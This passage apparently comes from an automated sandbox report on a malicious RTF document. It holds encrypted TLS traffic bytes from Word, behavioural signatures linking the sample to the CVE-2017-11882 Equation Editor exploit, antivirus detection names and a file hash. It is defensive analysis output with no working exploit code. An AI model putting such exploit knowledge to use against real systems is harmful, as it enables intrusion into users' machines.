  543. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xabd\\x18\\xaf\\xac\\xb5\\xa0k\\x01\\x97\\xd0\\xaem\\x84\\xa8\\xa6\\xc8s0\\xb5\\x9e\\xce\\xd0-)\\xbd\\x8c\\xeaqgj)\\x8d\\xba~*u\\xf4\\xc40\\x18\\xba\\x8e \\xa4py\\xbai\\x16\\xa5\\xb7<\\xfae\\x8a\\x04\\xd0d'8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000(\\x1b\\x87=\\xaav\\xd3\\xf6\\xc6d\\xc2\r\\x82\\x00\\x8d(\\xa2\\xfc\\xbb\\x12\\x0f\\xd2\\xf5\\x80a\\xf6\\x0c\\xd96\\xb3\\xb0\\xdd\\xd2\\x88\\xd3t*\\xf3\\x0c\r\\x92\\x8a\\x0b\\xa5\\xa6\\xe3\\xba\\x88"
  544.  
  545.  
  546. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x045\\x7f\\x0e_f\\x01\\x0bh\\x97\\xd1a\\xc3\\xd1\\xf22 \\xe8-\ni>\\x9e\\x07\\xbc\\x97i=\\x17\\x92\\xc6\\x08\\x01\\x9d\\xa2q5z\\x19\\xc4\\xaa\\xd2\\x96\\x94\n\\x16\\xc5g\\xb7\\x8b\\x1f\\xd0\\xa4\\xd8\\xd8\\x14\\xb1\\xf0\\xfa\\xc4\\x1f\\x92\\x99\\x91\\x99\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9b\\xe1!q\\xe6\\xe0c\\xf5c\\x0f\nvp\\xd2\\x9f:\\x88\\xf0\\xd2\\x87\\xb9c\\\\xde\".j\\xc4>\\xc2\\xc1zwj\\x19o'cs\\xb4\\xf4\\x9a\\xba\\xf1\\xdb\\x03\\xe6"
  547.  
  548.  
  549. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd5\\xdc\\x92b\\xfd\n\\x17\\xae\\x14e\\x0f\\xc6\\x96\\x97\\xd4\\x18\\x8d\\xb2\\xe5s\\x94r\\xcb\\xa1k\\xc7\\x074\\xafr\\x11\\xbc m\\xcca\\x97e\\x89\\xc1\\xf4stu5\\xd9\\xd9\\xe3b\\xe4\\xa2\\xednq\\x80x\\x0f\\xa7\\x0es\\xb1\\x0bn\\xb7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe1\\xe6\\x1fk\\x88z\tb^u\\xb0\\xb5\\xc3;\\xfb\\xbb\\x07<\\xfb\\x1fq\\xee\\xe8>\\xba \\xdcp\\xb9\\xa9?\\xdbqx\\xe7\\x97\\xc6\\xdc3,\\x97\\x9b\\xee\\xb9g(\\xa7"
  550.  
  551.  
  552. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94\\xf6\\x9f\\x98\\x07^!\\x13\\xba\\xca\\x9emo\\xe4\\xf7\r\\x0e&\\xcc1\\x98\\xfd\\xfetj\\xf2\\x109\\x14\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  553.  
  554.  
  555. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb8\\x9c\\x1f<\\xb2\\xc6\\xe9m\\x88\\xb90\\xffy\\xca\\xf6\\xef\\x00h\\xc0$\\xa7\\x11y\\xb7\\xfd\\xc4c\\xb4\\xdd\\xe7m\\xa7\\xf4\\xa3\\x07\\x0e-u\\x8a;\\x8ba\\x98p\\x03!\\xe3\\xb7m\\xee\\x0f\\x8c\\x0c\\xcf\\xf9\\xbb\\xa8q\\xd5\\x07\\xb1\\x7fh\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xfa`\\x92\\xd8(\\x9c\\xcd\\xfe\\xd6\\x90\\xa8\\xbb\\x98h\\xb8\\xebh\\xbe\\x06e\\x08\\x9c\\xc9\\x9c\\x95s|\\xc2\\xbdx\\x19\\xa5%g\\xc9\\x8a\\x99\\x9df \\xea\\x98k\\xddr\\xcbf\\x14"
  556.  
  557.  
  558. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\\x986\\xecs\\x0f\"j\\xf5\\x1c\\xe8\\xb4\\xac\\x8f\\xe8\\xa3\\x02p2^\\x1a\\xda\\xa2\\xd2\\xd0\\xe9\\xca\\xb3\\x9epw\\x9d\\xf2\\x8d\\xa3\\xe0~`o\\xa2x\\x07\\x1b\\xa5v\\x91@\\xae=\\x93\\x1cwkd\\x1c\\xb9g\\x94\\xab\\xe4qk\\xca\\xb2\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xecl_s:^\\xc4\\x1c:\\xb9\\xf8\\x1by\\xb0\\x0ey\\xb9'\\xb1\\x13\\x9c\\x8f\\x99\\xd9c\\x95ih\\xa7\\xf1dw\\xb4\\x10#\\x8b\\xe4&\\\\xd5\\x95*>iv\\xd6f\\xbe"
  559.  
  560.  
  561. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01h\\x81\\x94k\\x1d*\\x82\\xc4\\xa5in\\x16<o\\x80\\x8fb._4u\\xf3'\\xfc\\xd6\\xfc>w\\xfa\\xd7`\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  562.  
  563.  
  564. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04kv\\x83\\xfa\\x02m.j\\x16\\x88z\\x0f\\x81\\xda\\xd2$\\x02\\xf2~\\xc5\\xa4\tp\\xdc\\x18\\xb3h\\xb7\\xa3p\\x12\\xbf\\xc79\\xb1\\xb4b\\x1f\\xb6\\x93\\x99i\\xf2\\xf6/\\xb6\\x14\\xd5f\\xb6rg\\xbd\\xde!q\\xfc\\xeb\\x8d\\x84\\x03\\xc8\\xb5\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xc2\\x06\\xb1\\x0e\\x1e\\xe7.\\xf6\\x1f\\xda\\xce\\xfe\\xb3\\xc7\\x9e\\xe1\\xe1l\\xed+\\xc0\\xe1\\xeb\\xce\\x16\\xf6c\\x0f\\xa4\\xecfc\\x0e\\xfc\\xf0\\xde.\\x00/\\xd0\\x1d\\x93\\xc3\\xba\\x16\\xdf"
  565.  
  566.  
  567. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe6q`\\xd8\\xe4\\xf2;\\x08\\x80\\x83w\\xe4i\\xb1:\\xde$\\x1e\\xfb\\x1e\\x88\\x02\\xd8\\xf1\\xa56\\x8d\\x1e\\xde;\\xcc\\x0f\\xaaf\\x07am\\x99\\xcfwhy\\x06\\x18\\xf2le\\xa6 \\x1e\\x87\\x99\\x00@\\xa0\\x19^\\x04z\\xf7\\xd4md\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xdb\\xc9\\x1e\\xde\\xfby&9k\\xcb\\x919i\\x8e/\\xa5\\xf6\\x1c\\x18\\xc8c\\xbc>\\xe2\\xbfp\\xe5\\xb4\rs7\\xf2nl\\xa9x3l\\xdb<\\xfa\\xa2\\x9f\\xfbh\\xe1\\xda\\xec"
  568.  
  569.  
  570. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x90_\\xb0\\xeb\\\\xb3\\xefmg\\x8b\\x00%@\\xc6\\xab\\xec\\xe8\\x0fd\\xc0b\\x93\\xb3k\\x80\\xde\\xa7 1\\xb5o\\xca+\\xfb\\x0f\\xe6\\x18\\xce:\\xb8j#\\xd4\\xc2n\\x03\\x17\\x88\\xc8\\xfby\\x12\\xab\\x0b\\xcd\\xf1\\xe3\\x08\\x8f\\xb8>\\xe0\\xf5\\x87\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x0006\\xd8\\x9c\\xad\\xcdf\\xf8h\\x0f\\x91\\x9a\\x9d~\\x95\\xfd!\\x0f\\xa6\\x86u\\xa1\\x9f\\x8c\\x19\\x9b\\xcd\\xb1\\x9c\\x03\\xd8\\x8d\\xfdm\\xd1\\xcc\\x994\\xdd\\x10\\x03\\xf1\\xfd\\xd4\\x06-\\x85v\\xfc"
  571.  
  572.  
  573. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xaa\\xcb\\x1e\\x914\\xfa\\xa12ul3\\x0e\\x97\\x82ou\\xf3\\xf6q\\x05\\xf1(\\xb4+7'\\x03p\\xcfd\\xb0\\xbb\\xbd=\\xd5k\\x06\\xd1\\x85\\x08g\\x8c\\xfb\\xe0ts\\xe6\\xe8\\xbf\\xcc\\xaagrz\\d\\xf4az\\xf8\\x87\\x03\\xa7\\x19\\x10\\xed\\x03\\xd0\\xce/\\x9e\\xd1ki\\xa7\\xcf\\xf4;\\xd3!d\\xcb\\xf6\\x89f\\x02\\xe3\\xac\\xd7%%z\\x91w\\x1d\\x1cqn\\x14\\x0c\\x81\\xb0w\\xb3\\xcf\\xf1w\\xb7\\x03\\x99\t\\xc6\\xc5m\\xc0b7/v\\xe7\\xa2\\x88\\x95\\xc5\\x9f\\xbe~\\xec\\x8b\\xbc@'m\\xead|\\xfe\\x8a|\\xfe$k\\xb58\\xd4\\xcah\\x16\\xc2\\xe2\\x80\\xfe\\x08\\xa1\\xc5\\xad\\xe20\\x88k\\xc1\\xcb.\\xa5\\x89\\x9b\\xa0\\xe6v\\xe4\\x14\\x10\\x14\\xf57\\x1a+ej\\xd0\\xa5j\r)\\xe0\\xe2\\xf0t\\x1e\\xca\\xd3\\x8f\\x0f\\xcbr\\x0f+\\x81\\xf0u\\x1c\\xce\\x1a\\x9f\\xab\\xd9\\x80\\xcf\\x98\\xecrl\\xae\\xc5\\xfbz\\xbd\\x16\\x02\\x16u\\x8e\\xe5\\x83s\\x8e\\xb4\\xea4c\\x96\\x84\\xdf\\xcf\\5ob\\x87x\tx+\\x98\\xbe\\xf9x\\xdb"
  574.  
  575.  
  576. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x9c\\xdb\\xe6\\xfc or\\x81o\\xfd\\xe4\\xfcj\\xc7\\xf1\\xcb\\xf3\\x92\\xf8\\xb0\\x0fv6x)\\iy\\x8d\\x9f\\x1e\\xf3\\x1b\\x80\\xf0\\xce|\\xf8\\x1f\\xc5f\\x91\\xf7\\xbc\\x15\\x99\\xdf\\x89\\x8adms\\xea@\\x89j\\xd7?>i\\xf3\\x9d\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xa0&\\xd2\\xc4y\\xcc\\xe7\\x97w;x\\xfd\\xc9xj\\x88\\xee\\xcb\\xcf|o\\x8c\\xee\\xd7\\xb4\\x0b\\xd4\\xae\\xa1\\xbd\\xd5\\xba'\\xbc\\xf6\\x1aq\\x84\\x11rjo6\\xf1\\x89\\xf5\\x9e\\x90"
  577.  
  578.  
  579. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04>.\\xa7&w\\xb5\\xdb\\xdc\\x91\\x17v\\xc2\\xe9\\xffy\\xc7e\\xd4\\xee\\xfa,\\xe1\t\\xb4c\\x8e\\xf4\\x9e\\xd9\\xe8;\\xa1;v\\xab\\x11\\xa2;\\xe5.\\x01\\xec\\x13g\\x1a\\x97m\\x94\\x1c\\x1b\\xa9\\xe9\\xc1\\xe2\\xe8v\\x0cy\\xaa w3\\xd7\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xe3\\xcf\\x84\\xffa\\xf2\\xb02\\xec\\xecly\\x99:4d\\x19\\xaa\\x87v\\xc5%\\x0f\\x96z\\xa5cm\\xcb\\x84\\x07\\xd2\\xe9\\x192|\\x8a~\\xa3\t\\x9f\\xf6y\\xb8\\x10e\nc"
  580.  
  581.  
  582. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04k\\xb8\\xb9\\xfe\\x07e\"sbz\\x1b\\x101u\\x9c&\\xf9g)\\xc8\\xf3m\\xadt\\xb7\\xb3\\xbcj\\x08\\x98\\xc6$pm\\xdf\\xdc\\xcd\\x9es\\xc5\\x9atqj*\\xe6\\xce\\xc1\\x044@5xe4\\xde\\xd9\\xa2\\x07\\x9d\\xba\\xedi\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd1t*\\xafu@\\x03\\x1a\\x8a(r\\xcf_w\\x9b\t\\xf2v\\x02\\x92\\xba\\xf9\\xeep?\\xad\\x82x,\\xebhk\\xf9\\xad`((\\xba\\x9d:%\\x1c6\\xb4\\x88\\xcd"
  583.  
  584.  
  585. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x7f\\x86v\\xbc\\xb4\\xf2\\xb7\\x0fh\\xa8_ |rn\\xfb\\x1c'#=\\x9d2\\xd8\\x1f\\x9a\\xdd\\x0c\\x80\\xd1\\x19?\\x04\\\\x9c\\xe8lb\\xf8\\xce\\xbey\\x8c\\xf5\\x0e\\xb9z^\\xc9\\x13s\\xea\\xdc=\\x9b\\x81s\\x10\\xd9\to\\x15\\xb7\\x8e\rmxw*\\xfb\\xa9v\\x16#\\xe4\\x97u\\x8e\\xd1c\\xd4f\\x8fd\\xb5\\x9dd\\xac\\xa3h\\xa1\\xf4(\\x0f\\x12n\\x81\\xf1\\xe71s\\xc9\\xe9\\xe9\\xaa\\x8eq\\xc4+\\xc6\\x7f\\x0e3\\xa0\\xca_\\xd02\\x1b\\xbf?\\xff\\x91~\\x1c\\xcf\\xc1\\xef\\x95\\xc2\\xb3\n\\xca\\x0e\\xfd$\\xfc\\x90\\x15ou\\x8a\\xec|\\xdc6:0\\x1a\\xa0\\xb1\\x83\\xf7#|5c\\xe0-\\xb7\\x8c\\x9ai\\xeda\\xd7\\xe6l\\xef\\x87\\x96d\\x03\\x14\\xf4\\x88\\xe0\\x1bht\\xc2/\\xaf\\xcd90m\\xcb\\xaa\\xed\\x93u\\xb92\\x89u\\x81\\xd7\\xa3\\xa1\\xc6nj2%@\\xcc\\xd5\\x8f\\xf8\\xaa\\xb8\\x01\\xe4\\xc29\\xbdn\\x93\\xa7\\xdfs\\xb38\\xa4!7q\\x04\\xe6\\x80\\xd8\\x19$\\xea\\x84\\xc8\\xffp\\x9e\\xaf\\x96\\xa8\\xads\\xad\\xd4\\x89\\xb0l"
  586.  
  587.  
  588. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010$!\\xadaw\\x93\\xb5\\xde\\xcds\\x9d\\x18\\xeao\\xc7\\x8f\\xb2\\xfbi\\x8f\\x0b\\xbc\\x83\\:\\xd2\\x02<&;\\xba\\x9bg\\xd4\\xda\\x91\\xe0\\x1b\\xcf\\x8a3\\x06q\\x94\\x9dz\\xb8\\x9d\\x05=:\\x19\\x89\\xed\\xdb\\x85oa\\x96k\\xac\\xb1\\x18\\x97\\x02@\\xc2ystt\\xbeu\\xfd\\x12\\xc5\\x96\\xe9\\xf4\n\\xc1\\x90&\\x1b\\xb3\\\\xd0\\xd9\\x03\\x8c\\xfb\\xfc\\xcd\\x81\\xb5i\"\\x0bwd7\\x9c\\xe2\\xe2\\x13\\xfc\\xa5@=_\\xbb\\x9b\\xa1\\x93\\xc5\\x17\\x94\\xd4i\\xd9k\\xfc\\xb4\\xbed;\\x179\\x972\\xa5\\xfbs0\\xcfy\\x94\\x1a\\xbc\\xd4\\xbd\\x11\\xf2'\\xa2\\xff\\x98\\x1f\\x9f\"f\\xf0w\\xd2\\x97\\xbf\\xe6j\\xcd\\x8c\\xca\\x82\\xeav/\\xf3?w\\xef\\x0c\\x84l\\x0fp\\x12v;\\xba\\xdfb\\xce\\x05\\xb7\\x94\\xa2x\\xfbd\\xcbw1\\xa3\\xf39zh\\xd0s\\xf6\\x0c\\xfe\\xe6\\x12\\xde\\x00\\xa8\\x03\\x86=j\\xae\\xb7\\xd5vjj\\x94\\x92\\xe9e/\\x9ee\\x1c\\xee\\x1e\\xd9k\\xe5 \\x7f\\xa5*\\x81\\x82\\xc9\\xa6\\xe8\\x8f\\xc4\\xaa^p\\x91h\\xbbie\\xc1"
  589.  
  590.  
  591. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc1e\\x1a@\\xfdm\\x1cv\\xf8z\\xd9+\\xed~%\\x84\\x15\\x83\\xeb\\xcb!l\\x05\\xfa\\x0c\\xec_o\\xdd\\xf3:\\xa6\\xd8\\xcd4+:z\\xd6\\x98\\x8c\\xb5\\xe2za\\xdd\\\\xb9,\\xb43\\xa8\\xb3\\x9ek\\xba\\xd7\\xb9*v\\xa7`\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000l\\xbf\\xd6\\x89\\xe7\\xa3j\\xb8\\x8f\\x83\\x95\\xf0\\x03\\x1bv\\xd0\\x11y\\x05\\x12\\x9f#\\xaf\\x92\\x1c\\xa6\\xfa\\xe6\\x9a\\xfc\\xdf\\x00~\\xfeymy\\x85~\\x15\\xcc\\xb8\\x92\\x8c\\xff@"
  592.  
  593.  
  594. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe8\\x1e\\xa1\\xe2\\x82\\xc2$\\x82\\xfb\\x19\\xfez\\xe8id\\xb3\\x9d\\xd5d\\xa3#@\\xaf\\xde\\xed\\x14\\xccddk\\x86z\\x8b\\xcdxh\\x86\\x8c%\\x8b\\x003\\x89\\xfdg\\xeb\\x84ai\\xb6\\xeb\\x02\\x88\\xdf\\x0bj\\xcb0a\\xc4\\x8b\\xba-\\xf00\\x042\\x98n\\x03lth\\xfb\\x95\\xc5a$\\x82\\x97w\\xff\\x16\\xf4#\\xd3\\xffo\\x15\\xd0\\x18\\xdey\\x9c\\x19\\xcan\\xf8\\xf7\\xf33\\xe9\\xb9wu\\xa9\\xb3\\xe15\\xb6b\\x83\\xec\\xfai\\\\xfe\\x90\n<=\\x88b\\x0e\\x06\\xf2\\xa2\\xaa\\x07\\x148\\x9b\\xd0\\xda-\\x08\\x0e\\x98\\x17zvm\\xa6\\xccd1\\xe1\\xf4\\x06\\xda\\x1a\\x05\\xd9\\x1b\\xa8\\x8aq\\x8c\\xb3\\x13\\xbe/\\xbf6\\\\xb09\\xc8\\x9f\\xf0:e\\xbc\\x96\\xb6\\x98f\\x8a\\xa2\\x86\\xb3\\x95\\xca\\xbf\\xcc\\xd9i\\x9d\\xd7\\x15\\x03\\x04\\x14\\xe6\\x1c\\xf9\\x9e\\xb3l\\xce#;\\x1d\\x8dl\\xe1\\xd7&j\\x18\\x8dw\\xc1\\x90\\x0b\\x93:j\\xc5\\x12\\x03\\x15x\\xa3;\\x9cc@,\\xa7\\x06\\x12+\\xff\\xd0\\xd9\\x81z\\xca\\x00\\\\xc1\\x10\\x96\""
  595.  
  596.  
  597. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb1u\\xa0i\\xa6r\\x7f\\xe0d\\xe8\\x7f&\\xf1\\xbd(\\xc4\\x05\\xca\\x98\\xe4vs5j\\xc3\\xf0\\xa4\\x87y4\\xc6^\\xb5\\x80\\x96e\\xbb\\x08\\xc7\\xdd\\x1de\\xca'o`\\x81ea\\xb9'z\\x8f\\x822\\x07\\xa6\\x801\\xf9\\x86\\xcb&\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n-\\xeeh\\xe5\\x9a\\xf2y\\xe3\\x95\\xba\\xbfxyev\\x18\\xff\\xf2\\xd2\\xd2\\xf7\\x97\\xfa\\xd6\\x82~u\\xda\\xe7\\xd6j\\xc2\\xa4k\\x15\\xc6!\\xae\\x95k\\xc0$\\xc9\\x00k\\x06\\xe3"
  598.  
  599.  
  600. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe0\\xf0\\x0f\\x94\\xa4\\xb6\\xe4\\xc0\\xbd\\x03/$\\xe9\\x90v: s\\xcfb\\xfcn\\xc1\\x8c\\xed\\xfcm\\xe2h\\xac\\x03uv\\x1c\\xf5\\xf1c\\xf8\\x1c~n\\x04\\xedn\\xa8\\xaa \\xf2hc?\\xa4\\x89\\x14;a\\x01\\xaa-\\xc5\\xa7o\\xda\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xd7\\xb1\\x08%<ci\\xd1\\xbc\\xb8\\xb6umu\\xfb\\x10\t\\xf4\\xf5\\xdb\\xe0\\xd4\\x94\\x12\\xe3\\xc1\\xe5\\xdf\\x8b\\x04j\\x84_\\xbf\\xb4\\xb4\\x19\\xe4\\xcb\\x0f\\x92\\xf7\\x83ms\\xf2\\xf9"
  601.  
  602.  
  603. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xf6\\xcc\\xebb\\x1d/\\xc4\\xb7\t\\x18\\x1d\\xd7\\x17\\xa2$\\xd1*\\xec\\x154\\xda\\xe1^\\xab\\x8d\\x08\\xa3\\x8b\\x85\\xcdj\\xea\\x91\\xf3t9\\x1c7\\xba\\xe5,\\x1bnp\\xc5\\xb0n\\xda\nt\\xf0\\x13\\x97nm/\\xec\\xb7\\xa5\\xda\\xcc\\x96\\x98\\xdf\\xc9\\xf2 \\x876l\\x04r5\\x0f\\xf7ff\\xd2!z\\x0f\\xf4\\xad\\x1ai\\xadg\\xb88\\x16\\x14\\xa0\\xc8kt\\x02\\xcavzs\\xc7\\xeez\\xc2\\xb6\\xf8m\\xed\t\\xe9\\x8c\\x82\\x14x\\xe4\\xa5\\xa5\\x80\"\\xdf\\xb6\\xeat\\xb0\\x0f\\xeb\\x93\\x1d(\\x16\\xf9t\\x1f4\\xfcmk#\\xed\\xf7\\xe4\\xb62u|\\xda\\xc2\\xbf\\x88\\xd9\\x11\\x05\\x01n\\xc6\\xb6\\x9b\\xe6\\x14\\xffntm0j\\xfb\\x83h\\xed\\xf2\\x8a/\\xfc\\xda\\xcb\\x8d\\x82\\xc4\\xec\\xca:\\x1f\\x02\\x80|b\\xbc3\\x9e\\x15\\xda\\xc3m\\xa1\\xceb\\x0b\\x9b\\x8a\\x0f#p\\xdaf\\xa5\\xc6\\x87\\xe5i\\x01\\xa0\\x9a\\xc7\\xc9\\xb2m4\\x80\\xea*oa\\xe5\\x8f\\xc0\\x1c\\x9d\\x94q\\x7f\\xae\\xf0\\xce\\x9bc\\x1cslybt\\xbe\\xdd\\xd6\\xd9\\xcb\\x89\\x9b\\xfb6"
  604.  
  605.  
  606. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\x01w,gd\\xdc`\\xb4\\x01\\xab\\xd1\\xa9h\tm\\v\\xce<%\\x8b\\x95e\\xe5<\\x0f\\x82\\x17i\\x9e~\\xcd\\xd78\\x8c\\xf7-e4\\x7fqx/\\xd2\\xf5\\xef\\xa0y;\\xef\\x81\\xb4\\xc4\\xce@\\xcb\\x1b\\xe5\\xd9w9\\xa8\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000z\\x0b\\x8b2<\\x98\\x91\\xa1\\xf7yx\\x99\\x1b\\x1a\\x115\\xf6b:\\xd9lf_k\\xb6\\x1f\\xca7=&o\\x93j\\xf9\\xb4\\x99\\x83\\x7f\\xcb\\xc6:xq'\"\\xa8"
  607.  
  608.  
  609. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xe7\\xc0\\xfdgf\\xc5\\xfa\\xd0\\x0c\\xc8zp\\xc2q\\x8d\\xd5\\x93\\xad\\xe6sw\\xaf\\x07\\xe6a\\x11k%\\xad\\x0b\\xe9\\xdb\\xae\\xdc\\xda\\xc3:a\\xfc\\x1b\\x7f\\x8a\\xf8'\\xd3\\xc7\\xd2\\xdf\\x9b\\xe8$\"\\xef\\xede\\xaa\\xbd\\xd9g7mf\\xbb$\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\xf5\\x81\\xeb\\x9f\\x16\\xa4\\xf1v\\xa4\\xb05+\\xc6\t\\xb8\\xc6\\xed$\\x06\\x12<\\xd7\\x96\\xd3\\xe8\\xe6\\xd0\\x8bb\\xd0~\\xa8\\xcc\\xfe\\xc6\\xb0\\xc7\\x1a\\x05\\xeb\\xf3\\x9f\\xf4\"\\x00"
  610.  
  611.  
  612.  
  613.  
  614. "Description": "The EQNEDT32 equation process created a child process likely indicative of CVE-2017-11882 Office exploit",
  615. "Details":
  616.  
  617. "created_process": ""
  618.  
  619.  
  620.  
  621.  
  622. "Description": "Stack pivoting was detected when using a critical API",
  623. "Details":
  624.  
  625. "process": "WmiPrvSE.exe:2848"
  626.  
  627.  
  628.  
  629.  
  630. "Description": "Creates a hidden or system file",
  631. "Details":
  632.  
  633. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$BQQr0dX.doc"
  634.  
  635.  
  636. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\~WRL0001.tmp"
  637.  
  638.  
  639.  
  640.  
  641. "Description": "File has been identified by 34 Antiviruses on VirusTotal as malicious",
  642. "Details":
  643.  
  644. "MicroWorld-eScan": "Exploit.CVE-2017-11882.Gen"
  645.  
  646.  
  647. "FireEye": "Exploit.CVE-2017-11882.Gen"
  648.  
  649.  
  650. "McAfee": "Exploit-CVE2017-11882.yx"
  651.  
  652.  
  653. "Arcabit": "Exploit.CVE-2017-11882.Gen"
  654.  
  655.  
  656. "Symantec": "Exp.CVE-2017-11882!g2"
  657.  
  658.  
  659. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
  660.  
  661.  
  662. "Avast": "Win32:ShellCode Expl"
  663.  
  664.  
  665. "ClamAV": "Doc.Exploit.CVE_2017_11882-6934206-0"
  666.  
  667.  
  668. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
  669.  
  670.  
  671. "BitDefender": "Exploit.CVE-2017-11882.Gen"
  672.  
  673.  
  674. "AegisLab": "Hacktool.MSOffice.Generic.3!c"
  675.  
  676.  
  677. "Tencent": "Office.Exploit.Generic.Pdvz"
  678.  
  679.  
  680. "Ad-Aware": "Exploit.CVE-2017-11882.Gen"
  681.  
  682.  
  683. "Emsisoft": "Exploit.CVE-2017-11882.Gen (B)"
  684.  
  685.  
  686. "F-Secure": "Exploit:W97M/CVE-2017-0199.B"
  687.  
  688.  
  689. "DrWeb": "Exploit.ShellCode.69"
  690.  
  691.  
  692. "McAfee-GW-Edition": "Exploit-CVE2017-11882.yx"
  693.  
  694.  
  695. "Sophos": "Troj/RtfExp-EQ"
  696.  
  697.  
  698. "Cyren": "CVE-2017-11882.C.gen!Camelot"
  699.  
  700.  
  701. "Avira": "EXP/CVE-2017-11882.Gen"
  702.  
  703.  
  704. "MAX": "malware (ai score=94)"
  705.  
  706.  
  707. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
  708.  
  709.  
  710. "Microsoft": "Exploit:O97M/CVE-2017-11882.L"
  711.  
  712.  
  713. "AhnLab-V3": "OLE/Cve-2017-11882.Gen"
  714.  
  715.  
  716. "ZoneAlarm": "HEUR:Exploit.MSOffice.Generic"
  717.  
  718.  
  719. "GData": "Exploit.CVE-2017-11882.Gen (2x)"
  720.  
  721.  
  722. "ALYac": "Exploit.CVE-2017-11882.Gen"
  723.  
  724.  
  725. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  726.  
  727.  
  728. "Zoner": "Probably W97NativeOnly"
  729.  
  730.  
  731. "Rising": "Exploit.CVE-2017-11882!1.B40D (CLASSIC)"
  732.  
  733.  
  734. "Ikarus": "Exploit.CVE-2017-11882"
  735.  
  736.  
  737. "Fortinet": "MSOffice/CVE_2017_11882.A!exploit"
  738.  
  739.  
  740. "AVG": "Win32:ShellCode Expl"
  741.  
  742.  
  743. "Qihoo-360": "virus.exp.21711882.d"
  744.  
  745.  
  746.  
  747.  
  748. "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
  749. "Details":
  750.  
  751. "target": "clamav:Doc.Exploit.CVE_2017_11882-6934206-0, sha256:7e6d04a02911f357032f250c91ee5efd90634728d8c1bab5b1e170e30350ad84, type:Rich Text Format data, version 1, unknown character set"
  752.  
  753.  
